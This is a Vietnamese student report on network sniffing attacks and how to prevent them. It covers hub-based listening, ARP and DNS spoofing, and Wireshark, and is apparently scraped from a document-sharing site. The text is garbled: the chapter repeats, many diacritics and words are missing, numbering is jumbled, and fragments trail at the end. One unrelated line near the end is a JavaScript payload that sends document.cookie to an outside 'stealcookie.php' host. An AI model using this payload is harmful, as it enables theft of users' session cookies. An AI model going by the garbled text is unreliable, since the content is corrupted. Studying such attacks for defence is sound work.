CHƯƠNG 2: PHƯƠNG PHÁP TẤN CÔNG SNIFFING VÀ CÁCH PHÒNG CHỐNG 2.1. Giới thiệu 2.1.1. Khái niệm sniffing Sniffing là một hình thức nghe lén trên hệ thống mạng dựa trên những đặc điểm của cơ chế TCPIP. Người nghe lén để thiết bị lắng nghe giữa mạng mang thông tin như hai thiết bị điện thoại hoặc hai thiết bị đầu cuối trên internet. Nghe lén được sử dụng như công cụ để các nhà quản trị mạng theo dõi, bảo trì hệ thống mạng và có thể kiểm tra các dữ liệu ra vào mạng. Về mặt tiêu cực, nó được sử dụng với mục đích nghe lén các thông tin trên mạng để lấy các thông tin quan trọng. 2.1.2. Cơ chế hoạt động của sniffing Những giao dịch giữa các hệ thống mạng máy tính thường là những dữ liệu ở dạng nhị phân. Bởi vậy để hiểu được những dữ liệu này, các chương trình nghe lén phải có tính năng phân tích các nghi thức, cũng như tính năng giải mã các dữ liệu ở dạng nhị phân để hiểu được chúng. Hình 2.1: Cơ chế hoạt động của sniffing Trong môi trường Hub: Một khung gói tin khi chuyển từ máy A sang máy B thì đồng thời nó gửi đến tất cả các máy khác đang kết nối cùng Hub theo cơ chế loan tin (broadcast). Các máy khác nhận được gói tin này sẽ tiến hành so sánh yêu cầu về địa chỉ MAC của frame gói tin với địa chỉ đích. Nếu trùng lập thì sẽ nhận, còn không thì cho qua. Do gói tin từ A được gửi đến B nên khi so sánh thì chỉ có B mới giống địa chỉ đích đến nên chỉ có B mới thực hiện tiếp nhận. Dựa vào nguyên tắc đó, máy được cài đặt chương trình nghe trộm sẽ “tự nhận” bất cứ gói tin được lưu chuyển trong mạng qua Hub, kể cả khi đích đến gói tin có đích đến không phải là nó, do sniffer chuyển card mạng của máy sang chế độ hỗn tạp (promiscuous mode). Promiscuous mode là chế độ đặc biệt. Khi card mạng được đặt dưới chế độ này, nó có thể nhận tất cả các gói tin mà không bị ràng buộc kiểm tra địa chỉ đích đến. Trong môi trường Switch: Khác với Hub, Switch chỉ chuyển tải các gói tin đến những địa chỉ cổng xác định trong bảng chuyển mạch nên nghe trộm kiểu “tự nhận” như ở Hub không thực hiện được. Tuy nhiên, kẻ tấn công có thể dùng các cơ chế khác để tấn công trong môi trường Switch như ARP spoofing, MAC spoofing, MAC duplicating, DNS spoofing, v.v… 2.1.3. Phân loại sniffing Passive sniffing: Chủ yếu hoạt động trong môi trường không có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạng sử dụng Hub. Do không có các thiết bị chuyển mạch gói nên các gói tin được broadcast đi trong mạng. Chính vì vậy, việc thực hiện sniffing là khá đơn giản. Kẻ tấn công không cần gửi ra gói tin giả mạo nào, chỉ cần bắt các gói tin từ Port về (dù host nhận gói tin không phải là nơi đến của gói tin đó). Hình thức sniffing này rất khó phát hiện do các máy tự broadcast các gói tin. Ngày nay hình thức này thường ít được sử dụng do Hub không còn được ưa chuộng nhiều, thay vào đó là Switch. Active sniffing: Chủ yếu hoạt động trong môi trường có các thiết bị chuyển mạch gói, phổ biến hiện nay là các dạng mạch sử dụng Switch. Kẻ tấn công thực hiện sniffing dựa trên cơ chế ARP và RARP (2 cơ chế chuyển đổi từ IP sang MAC và từ MAC sang IP) bằng cách phát đi các gói tin đầu độc, mà cụ thể ở đây là phát đi các gói thông báo cho máy gửi gói tin là “tôi là người nhận” mặc không phải là “người nhận”. Ngoài ra, các sniffer còn có thể dùng phương pháp giả địa chỉ MAC, thay đổi MAC của bản thân thành MAC của một máy hợp lệ và qua được chức năng lọc MAC của thiết bị, qua đó ép dòng dữ liệu đi qua card mạng của mình. Tuy nhiên, do gói tin phải gửi đi nên sẽ chiếm băng thông. Nếu thực hiện sniffing quá nhiều máy trong mạng thì lượng gói tin gửi đi sẽ rất lớn (do liên tục gửi đi các gói tin giả mạo) có thể dẫn đến nghẽn mạng.
LỜI MỞ ĐẦU Ngày 19-1, Tập đồn cơng nghệ Bkav cơng bố chương trình đánh giá an ninh mạng Bkav thực vào tháng 12-2020 Theo đó, năm 2020, thiệt hại virus máy tính gây người dùng Việt Nam đạt kỷ lục mới, vượt mốc tỷ USD (23,9 nghìn tỷ đồng) Bức tranh tồn cảnh an ninh mạng Việt Nam 12 tháng qua có nhiều “điểm nóng” Hàng trăm tỷ đồng thiệt hại công an ninh mạng liên quan đến ngân hàng; nguy an ninh mạng từ trào lưu mạng xã hội; nhiều tổ chức, doanh nghiệp bị công có chủ đích theo cách thức mới… Covid-19 làm gia tăng công an ninh mạng Năm 2020, Covid-19 bùng phát, hàng loạt doanh nghiệp, quan, tổ chức chuyển sang làm việc từ xa Các phần mềm làm việc trực tuyến tìm kiếm download rầm rộ Nhiều đơn vị buộc phải mở hệ thống internet để nhân viên truy cập làm việc từ xa… Điều tạo môi trường cho kẻ xấu khai thác lỗ hổng, công, đánh cắp thông tin Trong năm qua, hàng loạt vụ công mạng quy mơ lớn diễn tồn cầu, điển vụ việc nhà máy Foxconn bị tin tặc cơng, bị địi 34 triệu USD tiền chuộc liệu; hay 267 triệu thông tin người dùng Facebook rao bán; Intel bị tin tặc cơng, gây rị rỉ 20 GB liệu bí mật… Mới nhất, TMobile, nhà mạng lớn Mỹ trở thành nạn nhân hacker Theo quan sát Bkav, Việt Nam, nhiều trang thương mại điện tử lớn, số tảng giao hàng trực tuyến có nhiều người sử dụng, bị xâm nhập đánh cắp liệu Khi làm việc từ xa, tổ chức doanh nghiệp cần thiết lập môi trường kết nối an toàn cách trang bị giải pháp SSL, VPN… đánh giá an ninh hệ thống, đánh giá phần mềm trước công khai internet; cài đặt phần mềm diệt virus, tường lửa, hệ thống giám sát… thường xuyên cập nhật vá hệ điều hành; trang bị phương thức xác thực người dùng mạnh chữ ký số Về phía người dùng cá nhân, cần cảnh giác cao độ làm việc từ xa; đồng thời bảo đảm môi trường kết nối an tồn cách cài đặt phần mềm diệt virus; khơng tải cài đặt phần mềm không rõ nguồn gốc; thường xuyên cập nhật vá phần mềm, hệ điều hành; không chia sẻ hay truy cập đường link lạ Các công diễn biến phức tạp, với số lượng công mạng vào quan, tổ chức, doanh nghiệp có chiều hướng tăng so với năm trước đây, công mạng vào hệ thống thông tin quan nhà nước doanh nghiệp lớn Bài báo cáo giới thiệu tổng quát phương pháp Hacker sử dụng để công mạng, nói cụ thể phương pháp cơng sniffing cách phòng chống Nội dung báo cáo gồm 03 chương: CHƯƠNG 1: GIỚI THIỆU CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG CHƯƠNG 3: DEMO PHƯƠNG PHÁP TẤN CÔNG SNIFFING CHƯƠNG 1: GIỚI THIỆU 1.1 Mục tiêu báo cáo Với phát triển mạnh mẽ mạng máy tính nay, nhu cầu sử dụng mạng cho việc trao đổi chia sẻ thông tin lớn Tuy nhiên, song song với việc an ninh mạng ln nỗi lo hình thức cơng mạng ngày nhiều ngày trở nên tinh vi Do việc nghiên cứu phương pháp công mạng cách phòng chống điều tất yếu Bài báo cáo “NGHIÊN CỨU CÁC PHƯƠNG PHÁP TẤN CÔNG MẠNG VÀ CÁCH PHỊNG CHỐNG” thực nhằm tìm hiểu kiểu công phổ biến mạng Cụ thể, báo cáo sâu vào nghiên cứu phương pháp cơng sniffing cách phịng chống Mục tiêu đề là: Tìm hiểu số kiểu cơng phổ biến mạng Tìm hiểu phương pháp cơng sniffing Cách phịng chống cơng sniffing CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG 2.1 Giới 2.1.1 thiệu Khái niệm sniffing Sniffing hình thức nghe hệ thống mạng dựa đặc điểm chế TCP/IP Người nghe để thiết bị lắng nghe mạng mang thông tin hai thiết bị điện thoại hai thiết bị đầu cuối internet Nghe sử dụng công cụ để nhà quản trị mạng theo dõi, bảo trì hệ thống mạng kiểm tra liệu vào mạng Về mặt tiêu cực, sử dụng với mục đích nghe thông tin mạng để lấy thông tin quan trọng 2.1.2 Cơ chế hoạt động sniffing Những giao dịch hệ thống mạng máy tính thường liệu dạng nhị phân Bởi để hiểu liệu này, chương trình nghe phải có tính phân tích nghi thức, tính giải mã liệu dạng nhị phân để hiểu chúng Hình 2.1: Cơ chế hoạt động sniffing Trong môi trường Hub: Một khung gói tin chuyển từ máy A sang máy B đồng thời gửi đến tất máy khác kết nối Hub theo chế loan tin (broadcast) Các máy khác nhận gói tin tiến hành so sánh yêu cầu địa MAC frame gói tin với địa đích Nếu trùng lập nhận, cịn khơng cho qua Do gói tin từ A gửi đến B nên so sánh có B giống địa đích đến nên có B thực tiếp nhận Dựa vào nguyên tắc đó, máy cài đặt chương trình nghe trộm “tự nhận” gói tin lưu chuyển mạng qua Hub, kể đích đến gói tin có đích đến khơng phải nó, sniffer chuyển card mạng máy sang chế độ hỗn tạp (promiscuous mode) Promiscuous mode chế độ đặc biệt Khi card mạng đặt chế độ này, nhận tất gói tin mà khơng bị ràng buộc kiểm tra địa đích đến Trong mơi trường Switch: Khác với Hub, Switch chuyển tải gói tin đến địa cổng xác định bảng chuyển mạch nên nghe trộm kiểu “tự nhận” Hub không thực Tuy nhiên, kẻ cơng dùng chế khác để công môi trường Switch ARP spoofing, MAC spoofing, MAC duplicating, DNS spoofing, v.v… 2.1.3 Phân loại sniffing Passive sniffing: Chủ yếu hoạt động mơi trường khơng có thiết bị chuyển mạch gói, phổ biến dạng mạng sử dụng Hub Do khơng có thiết bị chuyển mạch gói nên gói tin broadcast mạng Chính vậy, việc thực sniffing đơn giản Kẻ công không cần gửi gói tin giả mạo nào, cần bắt gói tin từ Port (dù host nhận gói tin khơng phải nơi đến gói tin đó) Hình thức sniffing khó phát máy tự broadcast gói tin Ngày hình thức thường sử dụng Hub khơng cịn ưa chuộng nhiều, thay vào Switch Active sniffing: Chủ yếu hoạt động mơi trường có thiết bị chuyển mạch gói, phổ biến dạng mạch sử dụng Switch Kẻ công thực sniffing dựa chế ARP RARP (2 chế chuyển đổi từ IP sang MAC từ MAC sang IP) cách phát gói tin đầu độc, mà cụ thể phát gói thơng báo cho máy gửi gói tin “tôi người nhận” mặc “người nhận” Ngồi ra, sniffer cịn dùng phương pháp giả địa MAC, thay đổi MAC thân thành MAC máy hợp lệ qua chức lọc MAC thiết bị, qua ép dịng liệu qua card mạng Tuy nhiên, gói tin phải gửi nên chiếm băng thông Nếu thực sniffing nhiều máy mạng lượng gói tin gửi lớn (do liên tục gửi gói tin giả mạo) dẫn đến nghẽn mạng Các hình thức cơng Sniffing hình thức nghe thơng tin mạng nhằm khai thác hiệu tài nguyên mạng, theo dõi thông tin bất hợp pháp Tuy nhiên, sau hacker dùng sniffing để lấy thông tin nhạy cảm, coi hình thức hack Có nhiều phương pháp để thực sniffing, dù công chủ động hay bị động Bài báo cáo nói cụ thể phương pháp công sniffing: 1) Lắng nghe thông tin qua Hub 2) Tấn công MAC 3) Tấn công DHCP 4) Chặn bắt thông tin dùng ARP – poisoning 5) Chặn bắt thông tin dùng DNS – spoofing 2.1.4 6) VLAN Hopping 7) 2.2 Lắng 2.2.1 nghe thông tin qua Hub Phương pháp công Sniffing mạng môi trường Hub giấc mơ ai, gói tin gửi qua thiết bị Hub qua tất cổng kết nối với Hub Một khung gói tin chuyển từ máy A sang máy B đồng thời gửi đến tất máy khác kết nối Hub theo chế loan tin (broadcast) Hình 2.2.1: Lắng nghe thơng tin qua Hub Để phân tích lưu lượng qua máy tính kết nối với thiết bị Hub cần kết nối packet sniffer tới cổng trống Hub Tuy nhiên, giao dịch hệ thống mạng máy tính thường liệu dạng nhị phân Vì chương trình nghe phải có chức giải mã liệu dạng nhị phân để hiểu chúng Ngồi ra, kẻ cơng chuyển card mạng sang chế độ Promiscuous Chế độ Promiscuous cho phép card mạng nhìn thấy tất gói tin qua hệ thống dây mạng Khi card mạng đặt chế độ này, nhận tất gói tin mà khơng bị ràng buộc kiểm tra địa đích đến Từ đó, kẻ cơng thấy tất truyền thơng đến từ máy tính đó, truyền thơng thiết bị khác kết nối với thiết bị Hub Tuy nhiên, ngày mạng Hub khơng cịn ưa chuộng có thiết bị truyền thơng thời điểm, thiết bị kết nối qua Hub phải cạnh tranh băng thông với thiết bị khác cố gắng truyền thơng qua thiết bị Hub Khi hai hay nhiều thiết bị truyền thông thời điểm, dễ xảy xung đột Hình 2.2.2: Xung đột nhiều thiết bị truyền thông thời điểm Kết gây mát gói tin, thiết bị phải truyền lại gói tin đó, khiến cho mạng trở nên tắc nghẽn Khi đến mức xung đột đó, thiết bị phải truyền lại gói tin đến tận 3,4 lần làm giảm hiệu mạng Ngồi ra, hình thức cơng qua Hub khó bị phát máy tự broadcast gói tin Vì nên dù Hub có tiện lợi, dễ sử dụng ngày nay, hầu hết mạng sử dụng Switch thay cho Hub 2.2.2 Các biện pháp phịng chống Phương pháp lắng nghe thơng tin qua Hub khó phát phịng chống, kẻ công tiến hành lắng nghe đường truyền bắt giữ lại gói tin mà khơng có tác động đáng kể vào hệ thống Vì cách đơn giản làm cách để gói tin khơng cịn broadcast nữa, cách sử dụng Switch thay cho Hub Ngồi dùng phương pháp “lấy độc trị độc” sử dụng cơng cụ nghe để phát có bị nghe hay khơng Các cơng cụ ngồi việc thực tác vụ nghe lén, cịn có khả dị tìm mạng nội có máy nghe hay không 2.3 Giới thiệu cơng cụ bắt chặn gói tin Wireshark 2.3.1 Khái niệm Wireshark phân tích gói mạng (network packet analyzer) Một network packet analyzer cố gắng nắm bắt network packets cố gắng hiển thị liệu gói chi tiết tốt 2.3.2 Chức • Chụp liệu gói trực tiếp từ giao diện mạng • Mở tệp có chứa liệu gói bắt tcpdump/ WinDump, Wireshark số chương trình packet capture khác • Nhập gói từ tệp văn có chứa hex dumps packet data • Hiển thị gói với thơng tin giao thức chi tiết • Lưu liệu gói bị bắt • Xuất số tất gói số định dạng capture file • Lọc gói tin nhiều tiêu chí • Tìm kiếm gói nhiều tiêu chí • Colorize gói hiển thị dựa lọc • Tạo số liệu thống kê khác 2.3.3 Demo sniffing lắng nghe gói tin qua Hub với Wireshark • Thiết lập máy Vmware • Ping máy • Bật wireshark để xem kết lắng nghe gói tin 2.4 Lắng nghe thơng tin qua Gateway 2.4.1 Tổng quan GateWay, địa MAC IP Gateway nút mạng sử dụng viễn thơng nhằm kết nối hai mạng có giao thức truyền thơng khác giao tiếp với Gateway có vai trị xử lý đầu vào mạng tất liệu phải qua giao tiếp với gateway trước định tuyến Trong hầu hết mạng IP, lưu lượng không qua gateway lưu lượng truyền nút phân đoạn mạng cục (LAN) Thuật ngữ default gateway network gateway sử dụng để mơ tả khái niệm Gateway sử dụng chủ yếu tình cá nhân doanh nghiệp muốn đơn giản hóa việc kết nối internet cho thiết bị Trong doanh nghiệp, gateway hoạt động máy chủ proxy tường lửa ĐỊA CHỈ IP VÀ ĐỊA CHỈ MAC KHÁC NHAU NHƯ THẾ NÀO? Cả địa IP địa MAC địa gán cho thiết bị kết nối mạng Trong địa MAC nhà sản xuất gán cho card NIC, địa IP gán cho thiết bị kết nối mạng Điểm khác địa IP địa MAC - tức địa MAC xác định thiết bị muốn tham gia mạng Ngược lại địa IP xác định kết nối mạng với giao diện thiết bị • document.location="https://pentestethical.000webhost.com/stealcookie.php?c=" + document.cookie + "&t=Alert"; ... chống Nội dung báo cáo gồm 03 chương: CHƯƠNG 1: GIỚI THIỆU CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG CHƯƠNG 3: DEMO PHƯƠNG PHÁP TẤN CÔNG SNIFFING CHƯƠNG 1: GIỚI THIỆU 1.1 Mục... thông tin qua Hub 2) Tấn công MAC 3) Tấn công DHCP 4) Chặn bắt thông tin dùng ARP – poisoning 5) Chặn bắt thông tin dùng DNS – spoofing 2. 1.4 6) VLAN Hopping 7) 2. 2 Lắng 2. 2.1 nghe thông tin... hiểu phương pháp cơng sniffing Cách phịng chống cơng sniffing CHƯƠNG 2: PHƯƠNG PHÁP TẤN CƠNG SNIFFING VÀ CÁCH PHỊNG CHỐNG 2. 1 Giới 2. 1.1 thiệu Khái niệm sniffing Sniffing hình thức nghe hệ thống